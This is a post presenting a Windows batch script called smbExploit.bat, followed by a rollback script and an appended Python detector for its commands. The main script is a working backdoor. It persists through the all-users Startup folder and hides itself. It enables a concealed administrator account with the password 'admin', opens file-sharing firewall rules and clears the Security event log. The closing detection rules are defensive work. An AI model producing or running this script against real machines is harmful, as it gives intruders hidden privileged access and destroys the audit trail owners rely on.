[Batch] Enabling the file sharing service

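Script function
Enables the host's file sharing service automatically at boot, activates the administrator account, enables the firewall's file-sharing rules, hides the administrator account and the script file, and clears the logs.

The second script restores the original state. It echoes information about the rollback process interactively.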

@echo off&color 0A
rem call smbExploitRelieve.bat

rem change code page into utf-8
chcp 65001 >nul 2>nul 

rem change the working directory to the directory that contains this script
cd /d %~dp0 >nul 2>nul 
cd 

rem copy to the current user's Startup folder
rem copy smbExploit.bat "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"  >nul 2>nul 

rem copy to the all-users (system) Startup folder
copy smbExploit.bat "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp" >nul 2>nul

rem modify file attribute
rem attrib +S +H "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\smbExploit.bat" >nul 2>nul 

rem all-users (system) Startup folder
attrib +S +H "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\smbExploit.bat" >nul 2>nul  

rem activate the administrator account
net user administrator admin /active:yes >nul 2>nul 


rem add reg to hide administrator account on system login window
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserList" /v administrator /t REG_DWORD /d 0 >nul 2>nul  

rem modify ACL of file
rem echo Y|cacls "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\smbExploit.bat" /G administrator:F >nul 2>nul 

rem system directory
echo Y|cacls "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\smbExploit.bat" /G administrator:F >nul 2>nul 

rem start net share service
net start FDResPub >nul 2>nul 

rem enable the firewall rule group for file and printer sharing
netsh advfirewall firewall set rule group="文件和打印机共享" new enable=yes >nul 2>nul 

rem clear log
wevtutil cl security >nul 2>nul 


@echo off&color 0A

echo ------modifing ACL
rem echo Y|cacls "%userprofile%\Start Menu\Programs\Startup\smbExploit.bat" /G everyone:F 1>nul  
echo Y|cacls "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\smbExploit.bat" /G everyone:F 1>nul 2>>"%userprofile%\errInfo.txt"
rem returns 0 on success
rem returns 2 if the file is not found


echo ------modifing file attributes
rem attrib -S -H "%userprofile%\Start Menu\Programs\Startup\smbExploit.bat" 1>nul
attrib -S -H "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\smbExploit.bat" 1>nul
rem returns 0 on success
rem returns 0 if the file is not found


echo ------baning administrator account
net user administrator  /active:NO 1>nul 2>>"%userprofile%\errInfo.txt"
rem returns 2 if access is denied
rem returns 0 if the command succeeds

echo ------deleting correlative reg object
echo yes|reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserList" /v administrator  1>nul 2>>"%userprofile%\errInfo.txt"
rem returns 0 if the operation succeeds
rem returns 1 if access is denied
rem returns 1 if the registry entry is not found

echo ------deleting exp
rem del "%userprofile%\Start Menu\Programs\Startup\smbExploit.bat" 1>nul
del "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\smbExploit.bat" 1>nul
rem errorlevel = 0
rem returns 0 if the file is not found
rem returns 0 on success

rem stop service
net stop fdrespub 1>nul 2>>"%userprofile%\errInfo.txt"
rem returns 2 if the service is not running
rem returns 0 on success

rem reset firewall rules
netsh advfirewall firewall set rule group="文件和打印机共享" new enable=no 1>nul 2>>"%userprofile%\errInfo.txt"
rem returns 1 if privileges are insufficient
rem returns 0 if the rules are updated successfully

for %%a in ("%userprofile%\errInfo.txt") do (
     if "%%~za" equ "0" (
       rem errInfo.txt is empty, so the rollback completed without errors: echo the message below
       echo :::::::::::::::::::::::::::::::::::::::::::::::
       echo smbExploit deleted,and rollbacked the operation of exp,have a good day!
        ) else (
       echo :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
       echo :::::::::::::here is the correlative error:::::::::::::::::::::
       echo :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
       type "%userprofile%\errInfo.txt"
       rem otherwise, review the error information
     )
)

choice /C YN /T 5 /M "是否继续检查相关信息?" /D Y
if errorlevel 2 (
del "%userprofile%\errInfo.txt"
exit
)
if errorlevel  1 (
echo ::::::::::::::::::::start information check::::::::::::::::::::::::::::::::
echo ------check administrator account
net user administrator
echo ------check correlative reg object
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts" 
echo ------check the state of net share service
sc query FDResPub|find /I "state" 
echo ------check firewall rules
netsh advfirewall firewall show rule name="文件和打印机共享(回显请求 - ICMPv4-In)" verbose
echo ------check exp file
dir "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp" /A|find "smbExploit.bat" 
rem dir "%userprofile%\Start Menu\Programs\Startup" /A|find "smbExploit.bat" 
)

del "%userprofile%\errInfo.txt"
pause
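
Added example (not part of the original post): a defender-side check that flags the external commands run by the first script when they show up in process-creation logs. The log shape, rule names, hostnames and the three-behaviour threshold are assumptions.

```python
import re
from collections import defaultdict

# One rule per external command run by the first script. Each pattern is
# matched against a process-creation command line (log shape is an assumption).
RULES = {
    "hide_startup_file": re.compile(
        r"\battrib(?:\.exe)?\b.*\+[SH]\b.*\\Start Menu\\Programs\\Startup\\", re.I),
    "enable_admin": re.compile(
        r"\bnet1?(?:\.exe)?\s+user\s+administrator\b.*/active:yes\b", re.I),
    # The SpecialAccounts path that the rollback script queries is covered too.
    "hide_account": re.compile(
        r"\breg(?:\.exe)?\s+add\b.*\\Winlogon\\(?:SpecialAccounts\\)?UserList\b.*/d\s+0\b",
        re.I),
    "enable_sharing_fw": re.compile(
        r"\bnetsh(?:\.exe)?\s+advfirewall\s+firewall\s+set\s+rule\s+group=.*\benable=yes\b",
        re.I),
    "clear_security_log": re.compile(
        r"\bwevtutil(?:\.exe)?\s+(?:cl|clear-log)\s+security\b", re.I),
}

def classify(cmdline):
    """Return the names of all rules that the command line matches."""
    return {name for name, rx in RULES.items() if rx.search(cmdline)}

def suspicious_hosts(events, threshold=3):
    """Map host -> sorted behaviours for hosts with >= threshold distinct hits."""
    seen = defaultdict(set)
    for host, cmdline in events:
        seen[host] |= classify(cmdline)
    return {h: sorted(b) for h, b in seen.items() if len(b) >= threshold}

STARTUP = r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\smbExploit.bat"
WINLOGON = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
# Constructed sample events as (host, command line); hostnames are made up.
SAMPLE_EVENTS = [
    ("WS-01", f'attrib +S +H "{STARTUP}"'),
    ("WS-01", "net user administrator admin /active:yes"),
    ("WS-01", f'reg add "{WINLOGON}\\UserList" /v administrator /t REG_DWORD /d 0'),
    ("WS-01", 'netsh advfirewall firewall set rule group="文件和打印机共享" new enable=yes'),
    ("WS-01", "wevtutil cl security"),
    ("WS-02", "net user administrator"),            # plain query, no activation
    ("WS-02", f'attrib -S -H "{STARTUP}"'),         # rollback, not hiding
    ("WS-02", "wevtutil el"),                       # lists logs only
]

if __name__ == "__main__":
    for host, hits in suspicious_hosts(SAMPLE_EVENTS).items():
        print(host, hits)
```

Requiring several distinct behaviours on one host keeps routine administration, such as a lone firewall rule change, from raising the alert.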